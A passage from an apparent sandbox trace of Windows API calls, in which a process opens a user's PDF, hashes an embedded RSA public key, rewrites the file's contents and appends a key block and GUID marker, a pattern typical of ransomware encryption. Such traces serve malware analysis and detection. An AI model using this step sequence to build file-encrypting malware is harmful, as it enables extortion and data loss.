(lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\7 BOWSPyroI2Cx.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\7 bowspyroi2cx.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.286] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=94236) returned 1 [0195.286] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.289] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x16ff6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.289] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.291] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.291] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1701c, lpOverlapped=0x0) returned 1 [0195.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.292] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea678) returned 1 [0195.293] CryptCreateHash (in: hProv=0x6ea678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.294] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.294] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.294] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.294] GetLastError () returned 0x0 [0195.294] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.294] CryptReleaseContext (hProv=0x6ea678, dwFlags=0x0) returned 1 [0195.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.294] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.294] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.294] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17020) returned 0x2d49778 [0195.295] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d425c8 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a120 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42610 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.296] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0195.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0195.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a0c0 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.301] GetCurrentThreadId () returned 0x264 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46990 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.302] GetCurrentThreadId () returned 0x264 [0195.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0195.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0195.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a168 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a138 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a180 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0195.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a180 | out: hHeap=0x6a0000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42610 | out: hHeap=0x6a0000) returned 1 [0195.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0195.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.316] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x17017, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x17017, lpOverlapped=0x0) returned 1 [0195.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.317] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1701c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.317] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.318] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.319] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.319] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, 